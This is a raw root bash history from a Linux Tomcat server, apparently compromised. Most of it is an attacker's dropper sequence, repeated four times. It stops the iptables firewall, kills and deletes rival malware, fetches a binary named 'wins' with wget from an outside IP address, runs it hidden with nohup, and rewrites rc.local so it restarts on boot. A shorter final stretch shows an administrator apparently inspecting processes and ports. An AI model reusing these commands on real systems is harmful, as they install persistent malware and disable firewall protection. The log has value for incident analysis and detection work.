490 2014-01-20 21:45:06 root rm -f -r /tmp/tmpof
491 2014-01-20 21:45:06 root rm -f -r /tmp/1471
492 2014-01-20 21:45:06 root rm -f -r /tmp/1417
493 2014-01-20 21:45:06 root rm -f -r /tmp/v432
494 2014-01-20 21:45:06 root rm -f -r /tmp/v532
495 2014-01-20 21:45:06 root rm -f -r /tmp/29881
496 2014-01-20 21:45:06 root rm -f -r /tmp/10993
497 2014-01-20 21:45:06 root rm -f -r /tmp/behsdf
498 2014-01-20 21:45:06 root rm -f -r /tmp/helen
499 2014-01-20 21:45:06 root rm -f -r /tmp/lampp
500 2014-01-20 21:45:06 root rm -f -r /tmp/Umi34Ber
501 2014-01-20 21:45:06 root rm -f -r /tmp/mysql.sock
502 2014-01-20 21:45:06 root rm -f -r /tmp/266189
503 2014-01-20 21:45:06 root rm -f -r /etc/x1
504 2014-01-20 21:45:06 root rm -f -r /etc/xxx
505 2014-01-20 21:45:06 root rm -f -r /etc/dos32
506 2014-01-20 21:45:06 root rm -f -r /etc/dos64
507 2014-01-20 21:45:06 root rm -f -r /etc/007
508 2014-01-20 21:45:06 root rm -f -r /etc/t32
509 2014-01-20 21:45:06 root rm -f -r /etc/lq64
510 2014-01-20 21:45:06 root rm -f -r /etc/t64
511 2014-01-20 21:45:06 root rm -f -r /etc/lq32
512 2014-01-20 21:45:06 root rm -f -r /etc/java.132.8_11
513 2014-01-20 21:45:06 root rm -f -r /etc/idmapd/apd.so.cp
514 2014-01-20 21:45:06 root rm -f -r /tmp/sshbin
515 2014-01-20 21:45:06 root rm -f -r /tmp/xudp
516 2014-01-20 21:45:06 root rm -f -r /tmp/xupd1
517 2014-01-20 21:45:06 root rm -f -r /tmp/xudp2
518 2014-01-20 21:45:06 root rm -f -r /tmp/xudp3
519 2014-01-20 21:45:06 root rm -f -r /tmp/xudp4
520 2014-01-20 21:45:06 root rm -f -r /tmp/xudp5
521 2014-01-20 21:45:06 root rm -f -r /tmp/java.2.15.22_20
522 2014-01-20 21:45:06 root rm -f -r /tmp/linuxssh
523 2014-01-20 21:45:06 root rm -f -r /tmp/strutsbin
524 2014-01-20 21:45:06 root rm -f -r /tmp/266189
525 2014-01-20 21:45:06 root rm -f -r etc/java.13.2.8_11
526 2014-01-20 21:45:06 root rm -f -r /etc/auto.bin
527 2014-01-20 21:45:06 root find /etc/ -name "*.service2" -exec rm {} \;
528 2014-01-20 21:45:06 root killall java-2013
529 2014-01-20 21:45:06 root killall wins
530 2014-01-20 21:45:06 root rm -f -r /etc/wins
531 2014-01-20 21:45:06 root rm -f -r /etc/java-2013
532 2014-01-20 21:45:06 root rm -f -r /etc/java-2013/java-2013
533 2014-01-20 21:45:06 root mkdir /etc/wins
534 2014-01-20 21:45:06 root wget -O /etc/wins/wins http://60.174.234.107:1974/wins
535 2014-01-20 21:45:07 root chmod 0755 /etc/wins/wins
536 2014-01-20 21:45:07 root nohup /etc/wins/wins > /dev/null 2>&1 &
537 2014-01-20 21:45:07 root rm -f -r /etc/rc.local
538 2014-01-20 21:45:07 root rm -r -f /etc/rc.d/rc.local
539 2014-01-20 21:45:07 root echo "/etc/init.d/iptables stop">>/etc/rc.local
540 2014-01-20 21:45:07 root echo "cd /etc/wins">>/etc/rc.local
541 2014-01-20 21:45:07 root echo "chmod 0755 /etc/wins/wins">>/etc/rc.local
542 2014-01-20 21:45:07 root echo "nohup /etc/wins/wins > /dev/null 2>&1 &">>/etc/rc.local
543 2014-01-20 21:45:07 root echo "/etc/init.d/iptables stop">>/etc/rc.d/rc.local
544 2014-01-20 21:45:07 root echo "cd /etc/wins">>/etc/rc.d/rc.local
545 2014-01-20 21:45:07 root echo "chmod 0755 /etc/wins/wins">>/etc/rc.d/rc.local
546 2014-01-20 21:45:07 root echo "nohup /etc/wins/wins > /dev/null 2>&1 &">>/etc/rc.d/rc.local
547 2014-01-20 21:45:07 root rm -f -r 2618
548 2014-01-20 21:45:07 root rm -r -f TS269
549 2014-01-20 21:45:07 root exit
550 2014-01-20 21:58:47 root /etc/init.d/iptables stop
551 2014-01-20 21:58:47 root echo "nameserver 8.8.8.8" >> /etc/resolv.conf
552 2014-01-20 21:58:47 root chmod 0775 /usr/bin/nohup
553 2014-01-20 21:58:47 root chmod 0775 /usr/bin/killall
554 2014-01-20 21:58:47 root killall lixtest
555 2014-01-20 21:58:47 root killall linuxx
556 2014-01-20 21:58:47 root killall ssh3
557 2014-01-20 21:58:47 root killall ssh4
558 2014-01-20 21:58:47 root killall ssh6
559 2014-01-20 21:58:47 root killall ssh-32
560 2014-01-20 21:58:47 root killall ssh-64
561 2014-01-20 21:58:47 root killall ssh-c4
562 2014-01-20 21:58:47 root killall java.13.2.8_11
563 2014-01-20 21:58:47 root killall drmc
564 2014-01-20 21:58:47 root killall tmpof
565 2014-01-20 21:58:47 root killall 1471
566 2014-01-20 21:58:47 root killall 1417
567 2014-01-20 21:58:47 root killall v432
568 2014-01-20 21:58:47 root killall v532
569 2014-01-20 21:58:47 root killall 29881
570 2014-01-20 21:58:47 root killall 10993
571 2014-01-20 21:58:47 root killall behsdf
572 2014-01-20 21:58:47 root killall helen
573 2014-01-20 21:58:47 root killall lampp
574 2014-01-20 21:58:47 root killall Umi34Ber
575 2014-01-20 21:58:47 root killall mysql.sock
576 2014-01-20 21:58:47 root killall sshd
577 2014-01-20 21:58:47 root killall xxx
578 2014-01-20 21:58:47 root killall dos32
579 2014-01-20 21:58:47 root killall dos64
580 2014-01-20 21:58:47 root killall 007
581 2014-01-20 21:58:47 root killall t32
582 2014-01-20 21:58:47 root killall lq64
583 2014-01-20 21:58:47 root killall t64
584 2014-01-20 21:58:47 root killall lq32
585 2014-01-20 21:58:47 root killall java.132.8_11
586 2014-01-20 21:58:47 root killall 261180
587 2014-01-20 21:58:47 root killall sshbin
588 2014-01-20 21:58:47 root killall xudp
589 2014-01-20 21:58:47 root killall xupd1
590 2014-01-20 21:58:47 root killall xudp2
591 2014-01-20 21:58:47 root killall xudp3
592 2014-01-20 21:58:47 root killall xudp4
593 2014-01-20 21:58:47 root killall xudp5
594 2014-01-20 21:58:47 root killall /etc/idmapd/idmapd.so.cp
595 2014-01-20 21:58:47 root killall idmapd.so.cp
596 2014-01-20 21:58:47 root killall .IptabLex
597 2014-01-20 21:58:47 root killall .IptabLes
598 2014-01-20 21:58:47 root killall linuxssh
599 2014-01-20 21:58:47 root killall strutsbin
600 2014-01-20 21:58:47 root killall 266189
601 2014-01-20 21:58:47 root killall auto.bin
602 2014-01-20 21:58:47 root rm -f -r /etc/idmapd/idmapd.so.cp
603 2014-01-20 21:58:47 root rm -f -r /tmp/linuxx
604 2014-01-20 21:58:47 root rm -f -r /tmp/ssh3
605 2014-01-20 21:58:47 root rm -f -r /tmp/sh4
606 2014-01-20 21:58:47 root rm -f -r /tmp/ssh6
607 2014-01-20 21:58:47 root rm -f -r /tmp/ssh-32
608 2014-01-20 21:58:47 root rm -f -r /tmp/ssh-64
609 2014-01-20 21:58:47 root rm -f -r /tmp/ssh-c4
610 2014-01-20 21:58:47 root rm -f -r /tmp/drmc
611 2014-01-20 21:58:47 root rm -f -r /tmp/tmpof
612 2014-01-20 21:58:47 root rm -f -r /tmp/1471
613 2014-01-20 21:58:47 root rm -f -r /tmp/1417
614 2014-01-20 21:58:47 root rm -f -r /tmp/v432
615 2014-01-20 21:58:47 root rm -f -r /tmp/v532
616 2014-01-20 21:58:47 root rm -f -r /tmp/29881
617 2014-01-20 21:58:47 root rm -f -r /tmp/10993
618 2014-01-20 21:58:47 root rm -f -r /tmp/behsdf
619 2014-01-20 21:58:47 root rm -f -r /tmp/helen
620 2014-01-20 21:58:47 root rm -f -r /tmp/lampp
621 2014-01-20 21:58:47 root rm -f -r /tmp/Umi34Ber
622 2014-01-20 21:58:47 root rm -f -r /tmp/mysql.sock
623 2014-01-20 21:58:47 root rm -f -r /tmp/266189
624 2014-01-20 21:58:47 root rm -f -r /etc/x1
625 2014-01-20 21:58:47 root rm -f -r /etc/xxx
626 2014-01-20 21:58:47 root rm -f -r /etc/dos32
627 2014-01-20 21:58:47 root rm -f -r /etc/dos64
628 2014-01-20 21:58:47 root rm -f -r /etc/007
629 2014-01-20 21:58:47 root rm -f -r /etc/t32
630 2014-01-20 21:58:47 root rm -f -r /etc/lq64
631 2014-01-20 21:58:47 root rm -f -r /etc/t64
632 2014-01-20 21:58:47 root rm -f -r /etc/lq32
633 2014-01-20 21:58:47 root rm -f -r /etc/java.132.8_11
634 2014-01-20 21:58:47 root rm -f -r /etc/idmapd/apd.so.cp
635 2014-01-20 21:58:47 root rm -f -r /tmp/sshbin
636 2014-01-20 21:58:47 root rm -f -r /tmp/xudp
637 2014-01-20 21:58:47 root rm -f -r /tmp/xupd1
638 2014-01-20 21:58:47 root rm -f -r /tmp/xudp2
639 2014-01-20 21:58:47 root rm -f -r /tmp/xudp3
640 2014-01-20 21:58:47 root rm -f -r /tmp/xudp4
641 2014-01-20 21:58:47 root rm -f -r /tmp/xudp5
642 2014-01-20 21:58:47 root rm -f -r /tmp/java.2.15.22_20
643 2014-01-20 21:58:47 root rm -f -r /tmp/linuxssh
644 2014-01-20 21:58:47 root rm -f -r /tmp/strutsbin
645 2014-01-20 21:58:47 root rm -f -r /tmp/266189
646 2014-01-20 21:58:47 root rm -f -r etc/java.13.2.8_11
647 2014-01-20 21:58:47 root rm -f -r /etc/auto.bin
648 2014-01-20 21:58:47 root find /etc/ -name "*.service2" -exec rm {} \;
649 2014-01-20 21:58:47 root killall java-2013
650 2014-01-20 21:58:47 root killall wins
651 2014-01-20 21:58:47 root rm -f -r /etc/wins
652 2014-01-20 21:58:47 root rm -f -r /etc/java-2013
653 2014-01-20 21:58:47 root rm -f -r /etc/java-2013/java-2013
654 2014-01-20 21:58:47 root mkdir /etc/wins
655 2014-01-20 21:58:47 root wget -O /etc/wins/wins http://60.174.234.107:1974/wins
656 2014-01-20 21:58:49 root chmod 0755 /etc/wins/wins
657 2014-01-20 21:58:49 root nohup /etc/wins/wins > /dev/null 2>&1 &
658 2014-01-20 21:58:49 root rm -f -r /etc/rc.local
659 2014-01-20 21:58:49 root rm -r -f /etc/rc.d/rc.local
660 2014-01-20 21:58:49 root echo "/etc/init.d/iptables stop">>/etc/rc.local
661 2014-01-20 21:58:49 root echo "cd /etc/wins">>/etc/rc.local
662 2014-01-20 21:58:49 root echo "chmod 0755 /etc/wins/wins">>/etc/rc.local
663 2014-01-20 21:58:49 root echo "nohup /etc/wins/wins > /dev/null 2>&1 &">>/etc/rc.local
664 2014-01-20 21:58:49 root echo "/etc/init.d/iptables stop">>/etc/rc.d/rc.local
665 2014-01-20 21:58:49 root echo "cd /etc/wins">>/etc/rc.d/rc.local
666 2014-01-20 21:58:49 root echo "chmod 0755 /etc/wins/wins">>/etc/rc.d/rc.local
667 2014-01-20 21:58:49 root echo "nohup /etc/wins/wins > /dev/null 2>&1 &">>/etc/rc.d/rc.local
668 2014-01-20 21:58:49 root rm -f -r 2618
669 2014-01-20 21:58:49 root rm -r -f TS269
670 2014-01-20 21:58:49 root exit
671 2014-01-20 22:01:32 root /etc/init.d/iptables stop
672 2014-01-20 22:01:32 root echo "nameserver 8.8.8.8" >> /etc/resolv.conf
673 2014-01-20 22:01:32 root chmod 0775 /usr/bin/nohup
674 2014-01-20 22:01:32 root chmod 0775 /usr/bin/killall
675 2014-01-20 22:01:32 root killall lixtest
676 2014-01-20 22:01:32 root killall linuxx
677 2014-01-20 22:01:32 root killall ssh3
678 2014-01-20 22:01:32 root killall ssh4
679 2014-01-20 22:01:32 root killall ssh6
680 2014-01-20 22:01:32 root killall ssh-32
681 2014-01-20 22:01:32 root killall ssh-64
682 2014-01-20 22:01:32 root killall ssh-c4
683 2014-01-20 22:01:32 root killall java.13.2.8_11
684 2014-01-20 22:01:32 root killall drmc
685 2014-01-20 22:01:32 root killall tmpof
686 2014-01-20 22:01:32 root killall 1471
687 2014-01-20 22:01:32 root killall 1417
688 2014-01-20 22:01:32 root killall v432
689 2014-01-20 22:01:32 root killall v532
690 2014-01-20 22:01:32 root killall 29881
691 2014-01-20 22:01:32 root killall 10993
692 2014-01-20 22:01:32 root killall behsdf
693 2014-01-20 22:01:32 root killall helen
694 2014-01-20 22:01:32 root killall lampp
695 2014-01-20 22:01:32 root killall Umi34Ber
696 2014-01-20 22:01:32 root killall mysql.sock
697 2014-01-20 22:01:32 root killall sshd
698 2014-01-20 22:01:32 root killall xxx
699 2014-01-20 22:01:32 root killall dos32
700 2014-01-20 22:01:32 root killall dos64
701 2014-01-20 22:01:32 root killall 007
702 2014-01-20 22:01:32 root killall t32
703 2014-01-20 22:01:32 root killall lq64
704 2014-01-20 22:01:32 root killall t64
705 2014-01-20 22:01:32 root killall lq32
706 2014-01-20 22:01:32 root killall java.132.8_11
707 2014-01-20 22:01:32 root killall 261180
708 2014-01-20 22:01:32 root killall sshbin
709 2014-01-20 22:01:32 root killall xudp
710 2014-01-20 22:01:32 root killall xupd1
711 2014-01-20 22:01:32 root killall xudp2
712 2014-01-20 22:01:32 root killall xudp3
713 2014-01-20 22:01:32 root killall xudp4
714 2014-01-20 22:01:32 root killall xudp5
715 2014-01-20 22:01:32 root killall /etc/idmapd/idmapd.so.cp
716 2014-01-20 22:01:32 root killall idmapd.so.cp
717 2014-01-20 22:01:32 root killall .IptabLex
718 2014-01-20 22:01:32 root killall .IptabLes
719 2014-01-20 22:01:32 root killall linuxssh
720 2014-01-20 22:01:32 root killall strutsbin
721 2014-01-20 22:01:32 root killall 266189
722 2014-01-20 22:01:32 root killall auto.bin
723 2014-01-20 22:01:32 root rm -f -r /etc/idmapd/idmapd.so.cp
724 2014-01-20 22:01:32 root rm -f -r /tmp/linuxx
725 2014-01-20 22:01:32 root rm -f -r /tmp/ssh3
726 2014-01-20 22:01:32 root rm -f -r /tmp/sh4
727 2014-01-20 22:01:32 root rm -f -r /tmp/ssh6
728 2014-01-20 22:01:32 root rm -f -r /tmp/ssh-32
729 2014-01-20 22:01:32 root rm -f -r /tmp/ssh-64
730 2014-01-20 22:01:32 root rm -f -r /tmp/ssh-c4
731 2014-01-20 22:01:32 root rm -f -r /tmp/drmc
732 2014-01-20 22:01:32 root rm -f -r /tmp/tmpof
733 2014-01-20 22:01:32 root rm -f -r /tmp/1471
734 2014-01-20 22:01:32 root rm -f -r /tmp/1417
735 2014-01-20 22:01:32 root rm -f -r /tmp/v432
736 2014-01-20 22:01:32 root rm -f -r /tmp/v532
737 2014-01-20 22:01:32 root rm -f -r /tmp/29881
738 2014-01-20 22:01:32 root rm -f -r /tmp/10993
739 2014-01-20 22:01:32 root rm -f -r /tmp/behsdf
740 2014-01-20 22:01:32 root rm -f -r /tmp/helen
741 2014-01-20 22:01:32 root rm -f -r /tmp/lampp
742 2014-01-20 22:01:32 root rm -f -r /tmp/Umi34Ber
743 2014-01-20 22:01:32 root rm -f -r /tmp/mysql.sock
744 2014-01-20 22:01:32 root rm -f -r /tmp/266189
745 2014-01-20 22:01:32 root rm -f -r /etc/x1
746 2014-01-20 22:01:32 root rm -f -r /etc/xxx
747 2014-01-20 22:01:32 root rm -f -r /etc/dos32
748 2014-01-20 22:01:32 root rm -f -r /etc/dos64
749 2014-01-20 22:01:32 root rm -f -r /etc/007
750 2014-01-20 22:01:32 root rm -f -r /etc/t32
751 2014-01-20 22:01:32 root rm -f -r /etc/lq64
752 2014-01-20 22:01:32 root rm -f -r /etc/t64
753 2014-01-20 22:01:32 root rm -f -r /etc/lq32
754 2014-01-20 22:01:32 root rm -f -r /etc/java.132.8_11
755 2014-01-20 22:01:32 root rm -f -r /etc/idmapd/apd.so.cp
756 2014-01-20 22:01:32 root rm -f -r /tmp/sshbin
757 2014-01-20 22:01:32 root rm -f -r /tmp/xudp
758 2014-01-20 22:01:32 root rm -f -r /tmp/xupd1
759 2014-01-20 22:01:32 root rm -f -r /tmp/xudp2
760 2014-01-20 22:01:32 root rm -f -r /tmp/xudp3
761 2014-01-20 22:01:32 root rm -f -r /tmp/xudp4
762 2014-01-20 22:01:32 root rm -f -r /tmp/xudp5
763 2014-01-20 22:01:32 root rm -f -r /tmp/java.2.15.22_20
764 2014-01-20 22:01:32 root rm -f -r /tmp/linuxssh
765 2014-01-20 22:01:32 root rm -f -r /tmp/strutsbin
766 2014-01-20 22:01:32 root rm -f -r /tmp/266189
767 2014-01-20 22:01:32 root rm -f -r etc/java.13.2.8_11
768 2014-01-20 22:01:32 root rm -f -r /etc/auto.bin
769 2014-01-20 22:01:32 root find /etc/ -name "*.service2" -exec rm {} \;
770 2014-01-20 22:01:32 root killall java-2013
771 2014-01-20 22:01:32 root killall wins
772 2014-01-20 22:01:32 root rm -f -r /etc/wins
773 2014-01-20 22:01:32 root rm -f -r /etc/java-2013
774 2014-01-20 22:01:32 root rm -f -r /etc/java-2013/java-2013
775 2014-01-20 22:01:32 root mkdir /etc/wins
776 2014-01-20 22:01:32 root wget -O /etc/wins/wins http://60.174.234.107:1974/wins
777 2014-01-20 22:01:34 root chmod 0755 /etc/wins/wins
778 2014-01-20 22:01:34 root nohup /etc/wins/wins > /dev/null 2>&1 &
779 2014-01-20 22:01:34 root rm -f -r /etc/rc.local
780 2014-01-20 22:01:34 root rm -r -f /etc/rc.d/rc.local
781 2014-01-20 22:01:34 root echo "/etc/init.d/iptables stop">>/etc/rc.local
782 2014-01-20 22:01:34 root echo "cd /etc/wins">>/etc/rc.local
783 2014-01-20 22:01:34 root echo "chmod 0755 /etc/wins/wins">>/etc/rc.local
784 2014-01-20 22:01:34 root echo "nohup /etc/wins/wins > /dev/null 2>&1 &">>/etc/rc.local
785 2014-01-20 22:01:34 root echo "/etc/init.d/iptables stop">>/etc/rc.d/rc.local
786 2014-01-20 22:01:34 root echo "cd /etc/wins">>/etc/rc.d/rc.local
787 2014-01-20 22:01:34 root echo "chmod 0755 /etc/wins/wins">>/etc/rc.d/rc.local
788 2014-01-20 22:01:34 root echo "nohup /etc/wins/wins > /dev/null 2>&1 &">>/etc/rc.d/rc.local
789 2014-01-20 22:01:34 root rm -f -r 2618
790 2014-01-20 22:01:34 root rm -r -f TS269
791 2014-01-20 22:01:34 root exit
792 2014-01-20 22:13:18 root ps -ef
793 2014-01-20 22:13:25 root ps -ef |more
794 2014-01-20 22:15:05 root ps -ef |more
795 2014-01-20 22:16:34 root ps -ef |more
796 2014-01-20 22:17:08 root top
797 2014-01-20 22:17:20 root ps -ef |more
798 2014-01-20 22:18:17 root ll -a /
799 2014-01-20 22:18:58 root ll -a /boot/
800 2014-01-20 22:19:39 root ps -ef |more
801 2014-01-20 22:21:02 root netstat -nltp
802 2014-01-20 22:21:18 root netstat -nltp
803 2014-01-20 22:23:10 root cd /opt/apache-tomcat-6.0.26/
804 2014-01-20 22:23:11 root ls
805 2014-01-20 22:23:15 root cd conf
806 2014-01-20 22:23:16 root ls
807 2014-01-20 22:23:37 root vi server.xml
808 2014-01-20 22:25:09 root netstat -nltp
809 2014-01-20 22:25:23 root vi server.xml
810 2014-01-20 22:25:39 root netstat -nltp
811 2014-01-20 22:25:57 root history
812 2014-01-20 22:26:25 root cd /etc/idmapd/
813 2014-01-20 22:26:31 root ll -a ./
814 2014-01-20 22:26:47 root rm -r -f /etc/idmapd
815 2014-01-20 22:26:52 root cd /etc/idmapd/
816 2014-01-20 22:27:36 root vi server.xml
817 2014-01-20 22:27:53 root pwd
818 2014-01-20 22:28:02 root cd /opt/apache-tomcat-6.0.26/conf
819 2014-01-20 22:28:03 root ls
820 2014-01-20 22:28:09 root vi server.xml
821 2014-01-20 22:12:32 root w
822 2014-01-20 22:12:41 root crontab -e
823 2014-01-20 22:12:56 root ps -efjH
824 2014-01-20 22:13:02 root cd /tmp/
825 2014-01-20 22:13:02 root ll
826 2014-01-20 22:13:06 root cat winskilled
827 2014-01-20 22:13:18 root ps -efjH
828 2014-01-20 22:14:04 root cd
829 2014-01-20 22:14:08 root cdf
830 2014-01-20 22:14:10 root cdl
831 2014-01-20 22:14:11 root ls
832 2014-01-20 22:14:13 root cd
833 2014-01-20 22:14:13 root ls
834 2014-01-20 22:14:15 root vi killback.sh
835 2014-01-20 22:15:22 root cd /tmp/
836 2014-01-20 22:15:22 root ls
837 2014-01-20 22:15:27 root cat winskilled
838 2014-01-20 22:16:23 root 平时
839 2014-01-20 22:16:25 root ps -efjH
840 2014-01-20 22:23:37 root :q
841 2014-01-20 22:27:04 root tail -f /tmp/winskilled
842 2014-01-20 22:29:08 root 227909
843 2014-01-20 22:29:08 root netstat -nltp
844 2014-01-20 22:25:23 root vi server.xml
845 2014-01-20 22:25:39 root netstat -nltp
846 2014-01-20 22:25:57 root history
847 2014-01-20 22:26:25 root cd /etc/idmapd/
848 2014-01-20 22:26:31 root ll -a ./
849 2014-01-20 22:26:47 root rm -r -f /etc/idmapd
850 2014-01-20 22:26:52 root cd /etc/idmapd/
851 2014-01-20 22:27:36 root vi server.xml
852 2014-01-20 22:27:53 root pwd
853 2014-01-20 22:28:02 root cd /opt/apache-tomcat-6.0.26/conf
854 2014-01-20 22:28:03 root ls
855 2014-01-20 22:28:09 root vi server.xml
856 2014-01-20 22:19:21 root crontab -l
857 2014-01-20 22:19:28 root crontab -l
858 2014-01-20 22:19:29 root cd /tmp/
859 2014-01-20 22:19:30 root ll
860 2014-01-20 22:19:34 root tail -f winskilled
861 2014-01-20 22:21:14 root ps -ef|grep -v grep |grep wins
862 2014-01-20 22:21:19 root ps -ef|grep -v grep
863 2014-01-20 22:21:21 root ps -ef|grep -v grep |grep wins
864 2014-01-20 22:21:28 root ps -ef |grep wins
865 2014-01-20 22:21:43 root ps -ef|grep -v grep |grep wins -C3
866 2014-01-20 22:21:46 root ps -ef|grep -v grep |grep wins -C3
867 2014-01-20 22:23:28 root :q:::q
868 2014-01-20 22:23:43 root ps
869 2014-01-20 22:23:44 root ll
870 2014-01-20 22:23:47 root tail -f winskilled
871 2014-01-20 22:23:58 root vi winskilled
872 2014-01-20 22:24:19 root :q
873 2014-01-20 22:24:24 root vi winskilled
874 2014-01-20 22:24:30 root o
875 2014-01-20 22:24:37 root vi winskilled
876 2014-01-20 22:24:44 root vi winskilled
877 2014-01-20 22:24:50 root ll
878 2014-01-20 22:24:55 root vi winskilled
879 2014-01-20 22:25:04 root cat /root/killback.sh
880 2014-01-20 22:28:19 root /etc/init.d/iptables stop
881 2014-01-20 22:28:19 root echo "nameserver 8.8.8.8" >> /etc/resolv.conf
882 2014-01-20 22:28:19 root chmod 0775 /usr/bin/nohup
883 2014-01-20 22:28:19 root chmod 0775 /usr/bin/killall
884 2014-01-20 22:28:19 root killall lixtest
885 2014-01-20 22:28:19 root killall linuxx
886 2014-01-20 22:28:19 root killall ssh3
887 2014-01-20 22:28:19 root killall ssh4
888 2014-01-20 22:28:19 root killall ssh6
889 2014-01-20 22:28:19 root killall ssh-32
890 2014-01-20 22:28:19 root killall ssh-64
891 2014-01-20 22:28:19 root killall ssh-c4
892 2014-01-20 22:28:19 root killall java.13.2.8_11
893 2014-01-20 22:28:19 root killall drmc
894 2014-01-20 22:28:19 root killall tmpof
895 2014-01-20 22:28:19 root killall 1471
896 2014-01-20 22:28:19 root killall 1417
897 2014-01-20 22:28:19 root killall v432
898 2014-01-20 22:28:19 root killall v532
899 2014-01-20 22:28:19 root killall 29881
900 2014-01-20 22:28:19 root killall 10993
901 2014-01-20 22:28:19 root killall behsdf
902 2014-01-20 22:28:19 root killall helen
903 2014-01-20 22:28:19 root killall lampp
904 2014-01-20 22:28:19 root killall Umi34Ber
905 2014-01-20 22:28:19 root killall mysql.sock
906 2014-01-20 22:28:19 root killall sshd
907 2014-01-20 22:28:19 root killall xxx
908 2014-01-20 22:28:19 root killall dos32
909 2014-01-20 22:28:19 root killall dos64
910 2014-01-20 22:28:19 root killall 007
911 2014-01-20 22:28:19 root killall t32
912 2014-01-20 22:28:19 root killall lq64
913 2014-01-20 22:28:19 root killall t64
914 2014-01-20 22:28:19 root killall lq32
915 2014-01-20 22:28:19 root killall java.132.8_11
916 2014-01-20 22:28:19 root killall 261180
917 2014-01-20 22:28:19 root killall sshbin
918 2014-01-20 22:28:19 root killall xudp
919 2014-01-20 22:28:19 root killall xupd1
920 2014-01-20 22:28:19 root killall xudp2
921 2014-01-20 22:28:19 root killall xudp3
922 2014-01-20 22:28:19 root killall xudp4
923 2014-01-20 22:28:19 root killall xudp5
924 2014-01-20 22:28:20 root killall /etc/idmapd/idmapd.so.cp
925 2014-01-20 22:28:20 root killall idmapd.so.cp
926 2014-01-20 22:28:20 root killall .IptabLex
927 2014-01-20 22:28:20 root killall .IptabLes
928 2014-01-20 22:28:20 root killall linuxssh
929 2014-01-20 22:28:20 root killall strutsbin
930 2014-01-20 22:28:20 root killall 266189
931 2014-01-20 22:28:20 root killall auto.bin
932 2014-01-20 22:28:20 root rm -f -r /etc/idmapd/idmapd.so.cp
933 2014-01-20 22:28:20 root rm -f -r /tmp/linuxx
934 2014-01-20 22:28:20 root rm -f -r /tmp/ssh3
935 2014-01-20 22:28:20 root rm -f -r /tmp/sh4
936 2014-01-20 22:28:20 root rm -f -r /tmp/ssh6
937 2014-01-20 22:28:20 root rm -f -r /tmp/ssh-32
938 2014-01-20 22:28:20 root rm -f -r /tmp/ssh-64
939 2014-01-20 22:28:20 root rm -f -r /tmp/ssh-c4
940 2014-01-20 22:28:20 root rm -f -r /tmp/drmc
941 2014-01-20 22:28:20 root rm -f -r /tmp/tmpof
942 2014-01-20 22:28:20 root rm -f -r /tmp/1471
943 2014-01-20 22:28:20 root rm -f -r /tmp/1417
944 2014-01-20 22:28:20 root rm -f -r /tmp/v432
945 2014-01-20 22:28:20 root rm -f -r /tmp/v532
946 2014-01-20 22:28:20 root rm -f -r /tmp/29881
947 2014-01-20 22:28:20 root rm -f -r /tmp/10993
948 2014-01-20 22:28:20 root rm -f -r /tmp/behsdf
949 2014-01-20 22:28:20 root rm -f -r /tmp/helen
950 2014-01-20 22:28:20 root rm -f -r /tmp/lampp
951 2014-01-20 22:28:20 root rm -f -r /tmp/Umi34Ber
952 2014-01-20 22:28:20 root rm -f -r /tmp/mysql.sock
953 2014-01-20 22:28:20 root rm -f -r /tmp/266189
954 2014-01-20 22:28:20 root rm -f -r /etc/x1
955 2014-01-20 22:28:20 root rm -f -r /etc/xxx
956 2014-01-20 22:28:20 root rm -f -r /etc/dos32
957 2014-01-20 22:28:20 root rm -f -r /etc/dos64
958 2014-01-20 22:28:20 root rm -f -r /etc/007
959 2014-01-20 22:28:20 root rm -f -r /etc/t32
960 2014-01-20 22:28:20 root rm -f -r /etc/lq64
961 2014-01-20 22:28:20 root rm -f -r /etc/t64
962 2014-01-20 22:28:20 root rm -f -r /etc/lq32
963 2014-01-20 22:28:20 root rm -f -r /etc/java.132.8_11
964 2014-01-20 22:28:20 root rm -f -r /etc/idmapd/apd.so.cp
965 2014-01-20 22:28:20 root rm -f -r /tmp/sshbin
966 2014-01-20 22:28:20 root rm -f -r /tmp/xudp
967 2014-01-20 22:28:20 root rm -f -r /tmp/xupd1
968 2014-01-20 22:28:20 root rm -f -r /tmp/xudp2
969 2014-01-20 22:28:20 root rm -f -r /tmp/xudp3
970 2014-01-20 22:28:20 root rm -f -r /tmp/xudp4
971 2014-01-20 22:28:20 root rm -f -r /tmp/xudp5
972 2014-01-20 22:28:20 root rm -f -r /tmp/java.2.15.22_20
973 2014-01-20 22:28:20 root rm -f -r /tmp/linuxssh
974 2014-01-20 22:28:20 root rm -f -r /tmp/strutsbin
975 2014-01-20 22:28:20 root rm -f -r /tmp/266189
976 2014-01-20 22:28:20 root rm -f -r etc/java.13.2.8_11
977 2014-01-20 22:28:20 root rm -f -r /etc/auto.bin
978 2014-01-20 22:28:20 root find /etc/ -name "*.service2" -exec rm {} \;
979 2014-01-20 22:28:20 root killall java-2013
980 2014-01-20 22:28:20 root killall wins
981 2014-01-20 22:28:20 root rm -f -r /etc/wins
982 2014-01-20 22:28:20 root rm -f -r /etc/java-2013
983 2014-01-20 22:28:20 root rm -f -r /etc/java-2013/java-2013
984 2014-01-20 22:28:20 root mkdir /etc/wins
985 2014-01-20 22:28:20 root wget -O /etc/wins/wins http://60.174.234.107:1974/wins
986 2014-01-20 22:28:21 root chmod 0755 /etc/wins/wins
987 2014-01-20 22:28:21 root nohup /etc/wins/wins > /dev/null 2>&1 &
988 2014-01-20 22:28:21 root rm -f -r /etc/rc.local
989 2014-01-20 22:28:21 root rm -r -f /etc/rc.d/rc.local
990 2014-01-20 22:28:21 root echo "/etc/init.d/iptables stop">>/etc/rc.local
991 2014-01-20 22:28:21 root echo "cd /etc/wins">>/etc/rc.local
992 2014-01-20 22:28:21 root echo "chmod 0755 /etc/wins/wins">>/etc/rc.local
993 2014-01-20 22:28:21 root echo "nohup /etc/wins/wins > /dev/null 2>&1 &">>/etc/rc.local
994 2014-01-20 22:28:21 root echo "/etc/init.d/iptables stop">>/etc/rc.d/rc.local
995 2014-01-20 22:28:21 root echo "cd /etc/wins">>/etc/rc.d/rc.local
996 2014-01-20 22:28:21 root echo "chmod 0755 /etc/wins/wins">>/etc/rc.d/rc.local
997 2014-01-20 22:28:21 root echo "nohup /etc/wins/wins > /dev/null 2>&1 &">>/etc/rc.d/rc.local
998 2014-01-20 22:28:21 root rm -f -r 2618
999 2014-01-20 22:28:21 root rm -r -f TS269
1000 2014-01-20 22:28:21 root exit
1001 2014-01-20 22:31:17 root vi killback.sh
1002 2014-01-20 22:32:37 root cd /tmp/
1003 2014-01-20 22:32:37 root ls
1004 2014-01-20 22:32:39 root ll
1005 2014-01-20 22:32:46 root rm java.pl
1006 2014-01-20 22:32:51 root vi java.pl
1007 2014-01-20 22:33:26 root history
